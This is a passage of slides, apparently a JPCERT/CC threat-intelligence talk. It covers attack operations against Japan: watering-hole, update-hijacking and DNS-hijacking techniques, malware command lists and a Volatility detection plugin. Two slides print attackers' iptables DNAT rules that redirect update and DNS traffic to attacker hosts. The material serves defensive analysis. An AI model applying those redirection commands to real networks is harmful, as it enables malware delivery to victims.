![Page 53: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/53.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Attack Techniques
Drive-by Download Attack
Update Hijacking
Domain Name Hijacking
52
![Page 54: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/54.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Attack Techniques
Drive-by Download Attack
Update Hijacking
Domain Name Hijacking
53
![Page 55: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/55.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Drive-by Download (Watering Hole) Attack
54
Targeted Organization
Japanese Web server
1. Access to Web site
2. Redirect
0. Deface Web site
3. Download malware 4. Malware
Infection
Attacker’s Server
![Page 56: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/56.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Access Control
55
.htaccess
Target name
IP address
![Page 57: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/57.jpg)
Copyright©2015 JPCERT/CC All rights reserved. 56
• Detected around September 2013 • Vulnerability in Internet Explorer
CVE-2013-3893 (MS13-080)
• Detected around October 2013 • Vulnerability in Internet Explorer
CVE-2013-3918 (MS13-090)
• Detected around February 2014 • Vulnerability in Internet Explorer
CVE-2014-0324 (MS14-012)
0-day Exploits
![Page 58: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/58.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Attack Techniques
Drive-by Download Attack
Update Hijacking
Domain Name Hijacking
57
![Page 59: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/59.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Update Hijacking
58
Targeted Organization
Update Server
1. Request to update
0. Alter updated information
4. Download malware 5. Malware Infection
Fake Update Server
2. Fake update Information
3. Request to download
Method used to alter updated information
![Page 60: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/60.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Another Update Hijacking Pattern
Targeted Organization
Update Server
Fake Update Server
Method used without changing update server's file
59
0. Change iptables
1. Software Update
![Page 61: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/61.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Another Update Hijacking Pattern
Method used without changing update server's file
iptables -t nat -A PREROUTING -i eth0 -s aa.bb.cc.dd -p tcp --dport 80 -j DNAT --to-destination ww.xx.yy.zz:53
60
TCP 80 is forwarded by iptables.
• Update server's file is unchanged • Does not save iptables • Targeted organization sees as if it is
communicating with legitimate update server
Key Point
![Page 62: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/62.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Attack Techniques
Drive-by Download Attack
Update Hijacking
Domain Name Hijacking
61
![Page 63: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/63.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Domain Name Hijacking
62
Targeted Organization
Registrar Registry .com DNS Server
Attacker’s Infrastructure
DNS Server
Web Server
DNS Server
Web Server
Legitimate Server
0. Change registration information
1.DNS query
2.DNS query
4.Web access
![Page 64: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/64.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
DETAILS OF MALWARE
63
![Page 65: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/65.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Domain Name Hijacking
iptables -t nat -A PREROUTING -p udp --dport 53 -m string --from 30 --to 34 --hex-string "|03|AAA" --algo bm -j DNAT --to-destination aa.bb.cc.dd:54
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to ww.xx.yy.zz:53
64
Routing of only specific DNS queries by using iptables
• Routing of only specific sub domains • Other DNS queries are routed to the
legitimate DNS server
Key Point AAA.example.com
![Page 66: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/66.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Characteristics of Malware
65
① Uses a different malware before and after
the intrusion
② Some malware run in memory only
③ Embedding target organization's internal information
④ Uses code signing certificate in some cases
![Page 67: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/67.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Characteristics of Malware
66
BlackCoffee McRAT Preshin Agtid
Hikit Derusbi PlugX
Intrusion
Concealing
![Page 68: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/68.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Malware (Intrusion)
67
BlackCoffee McRAT Preshin Agtid
command info 0x184004 Execute remote shell 0x184008 Run remote shell command 0x18400c Create file 0x184010 Load file 0x184014 Get drive information 0x184018 Create directory 0x18401c Search file 0x184020 Delete file
command info 0x184024 Move file 0x184028 Process list 0x18402c Terminate process 0x184030 Sleep 0x184034 Install command 0x184038 Set Sleep Time 0x18403c Terminate
HTTP bot with basic functions
Command List
![Page 69: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/69.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
IP Address Acquisition Algorithm
68
Get C2 IP address from Web page
Decode
start: @MICR0S0FT end: C0RP0RATI0N
start: lOve yOu 4 eveR end: Reve 4 uOy evOl
![Page 70: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/70.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Malware (Intrusion)
69
Plug-in-based malware
command number info 0 Send data to server 1 Set TickCount 3 Plug-in registration 4 Allocate Plug-in settings area 5 Set Plug-in settings area 6 Create/Execute plug-in 7 Terminate plug-in 8 Create configuration file 9 -
BlackCoffee McRAT Preshin Agtid
Command list
![Page 71: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/71.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Malware Running in Memory Only
70
CVE-2013-3918 with McRAT
ROP
skip
Shellcode
Malware
![Page 72: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/72.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Malware Running in Memory Only
71
CVE-2013-3918 with McRAT
Executes rundll32.exe and injects code McRAT's data below Shellcode is injected Not saved as a file
![Page 73: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/73.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Malware (Intrusion)
72
Simple HTTP bot with limited functions
command info
downonly Download file
downexec Download and Execute file
- Run remote shell command
BlackCoffee McRAT Preshin Agtid
Command list
![Page 74: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/74.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Preshin Controller
73
PHP-based Controller
![Page 75: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/75.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Preshin Controller
74
Example of command execution
![Page 76: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/76.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Malware (Intrusion)
75
HTTP bot with basic functions
command info 1 Get disk information 2 File list 3 Open file 4 Upload file 5 Create file 7 Load file
command info 8 - 9 Delete file
10 Delete file/folder 11 Upload file 12 Create folder 13 Move file
BlackCoffee McRAT Preshin Agtid
Command list
![Page 77: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/77.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Malware (Concealing)
76
Hikit Derusbi PlugX
Malware with Rootkit functions
command info file File related operation information Send configuration information proxy Enable Proxy settings connect Connect to Hikit proxy shell Run remote shell command socks5 Enable Proxy settings (socks5)
exit Terminate
Command list
![Page 78: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/78.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Hikit Configuration Information
77
Hikit has proxy information of the internal network
Proxy info
ID Target name
Rootkit setting
![Page 79: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/79.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Malware (Concealing)
78
Malware recently often used
command info
cmd4 Service/Process related operation
cmd5 Run remote shell command cmd6 Connect to Derusbi proxy
cmd7 File operation
cmd8 Terminate
cmd9 Create/Delete file
Hikit Derusbi PlugX
Command list
![Page 80: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/80.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Derusbi Configuration Information
79
Derusbi has proxy information of the internal network
Proxy info
ID
![Page 81: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/81.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Code Signing Certificate
80
Identity Type Country System Integrator exe Japan
Software Vendor exe Japan
Software Vendor exe Korea
Automaker exe Korea
Heavy Industry jar Korea
Software Vendor exe Korea
Electronics Industry jar Korea
Software Vendor exe Korea
![Page 82: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/82.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Infrastructure Used by Attackers
81
Targeted Organization
Attacker’s Server
Web Server
Overseas Server
Backdoor
Japan
C2 Server
iptables
![Page 83: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/83.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Linux Backdoor
82
mod_rootme source
• apache module • Runs a remote shell by sending a keyword
mod_rootme
Keyword “Roronoa”
![Page 84: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/84.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Linux Backdoor
83
• Highly sophisticated Linux bot
rs_linux
Function MyNetstat CreateShell Mymkdir
PortTunnelGet GetFileSource Mymkfile PortTunnel_RemoteClose MyPs Myrmfile
PortTunnel_Show KillByPid Myrmdir CreatePortTunnel NewConnectTo ListDir
PortForward StartPutFile my_reboot PortForward_Show PutFileDest ShowHide PortForward_Close ShellServer SwitchHide
![Page 85: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/85.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
ANALYSIS TOOLS
84
apt17scan.py
![Page 86: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/86.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
apt17scan.py
• Volatility Plugin • Detect malware in memory dump • Extract malware configuration information
apt17scan.py
• apt17scan • derusbiconfig • hikitconfig • agtidconfig
Function
85
![Page 87: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/87.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
apt17scan.py
86
Scan with YARA
Search configuration data address
Parse configuration data
Dump configuration
![Page 88: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/88.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
apt17scan.py
87
Agtid Hikit McRAT
Preshin BlackCoffee Derusbi
apt17scan Detecting Malware
![Page 89: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/89.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
apt17scan.py
88
derusbiconfig Dump configuration information for Derusbi
![Page 90: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/90.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
apt17scan.py
89
hikitconfig Dump configuration information for Hikit
![Page 91: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/91.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
apt17scan.py
90
agtidconfig Dump configuration information for Agtid
![Page 92: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/92.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
DEMO
91
![Page 93: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/93.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
How to Download
92
https://github.com/JPCERTCC
![Page 94: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/94.jpg)
Thank You!
Contact [email protected] https://www.jpcert.or.jp
Incident Report
[email protected] https://www.jpcert.or.jp/form/